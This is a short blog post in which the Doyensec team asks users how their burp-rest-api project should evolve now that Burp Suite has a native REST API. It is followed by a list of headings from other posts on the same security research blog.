Help Us Shape The Future of burp-rest-api

With the release of Burp Suite Professional 2.0 (beta), Burp includes a native Rest API.

While the current functionalities are very limited, this is certainly going to change.

In the initial release, the REST API supports launching vulnerability scans and obtaining the results. Over time, additional functions will be added to the REST API.

It’s great that Burp users will finally benefit from a native Rest API, however this new feature makes us wonder about the future for this project.

Let us know how burp-rest-api can still provide value, and which directions the project could take. Comment on this Github Issue or tweet to our @Doyensec account.

Thank you for the support,

Luca Carettoni & Andrea Brancaleoni

Doyensec's Blog

Introducing Session Switcher. Swap Burp Sessions with One Click!

The Problem

The Solution

How Session Switcher Works

Saving Sessions

Switching Sessions

Sessions Management Tab

Auto Update Rules

Settings

Installation

For the Future

Contributing

Comparing AI Application Security Testing Platforms

Navigating Lax Load Balancers: When an Intersection Gets You Inside

Tidbit No. 5 - Navigating Lax Load Balancers

What is AWS ELB?

Why It Matters

Configuration vs. Real Exposure

The Bugs

1. CloudFront / WAF Bypass via Direct ALB Access

2. Rule Shadowing

3. IP Gate Bypass via Alternate ALB

Infrastructure is not just configuration. It defines how traffic actually flows, and misconfigurations create unintended paths

For Cloud Security Auditors

For Developers

Tool Release: ELBaph

Hands-On IaC Lab

Resources

When Filenames Become Attack Surfaces: Weaponizing NASA's CFITSIO Extended Filename Syntax

Extended Filename Syntax

A Tiny Lab Environment

Primitive 1: Arbitrary File Copy

Primitive 2: Forced Downloads and SSRF

Primitive 3: HTTP Header Injection

Primitive 4: Local File Exfiltration via root://

Edge Cases and Workarounds

Hard to Fix

The Danger of Multi-SSO AWS Cognito User Pools

From the Previous Episodes

Tidbit No. 4 - The Danger of Multi-SSO User Pools

AWS Cognito Multi-SSO Flows

Introducing a New Actor, AWS Lambda Triggers Primer

What if the IdP Is Malicious? Full Flow Example

1. JIT Ghost Identity Injection: Sometimes Landing Is Enough

2. Trigger Source Values: Forgotten Events

3. Federated Username Format & the Sub-Splitting Attack

Provider Collision: Case and Homoglyph

Sub-Level Splitting Attack

4. IdP Identifiers and Routing Hijacks

Do Not Trust the IdP

For Cloud Security Auditors

For Developers

Tool Release: maSSO, a Malicious IdP for the Job

Hands-On IaC Lab

Resources

CFITSIO Fuzzing: Memory Corruptions and a Codex-Assisted Pipeline

FITS Format

First Round: Generic Fuzzing

Second Round: EFS

Workflow Improvements

Example finding

Advisory

Closing Thoughts

The MCP AuthN/Z Nightmare

MCP Attack Vectors

Malicious MCP Server

Malicious MCP Client

Other Malicious Actors

The Nightmare: New Actors, New Problems to Solve

A Scary Sequence Diagram

Enterprise Authentication and Authorization: a Work in Progress

The JAG Problem (Identity Assertion JWT Authorization Grant)

Conclusion

Building a Secure Electron Auto-Updater

Introduction

The State of Electron Auto-Updates

autoUpdater

electron-updater

Differences between “autoUpdater” and “electron-updater”

Primitive 4: Local File Exfiltration via `root://`

6. downgradeEnabled (optional, default: `false`)

Heap Shaping for `kvzalloc`

How VBS’s `Randomize` Works in Practice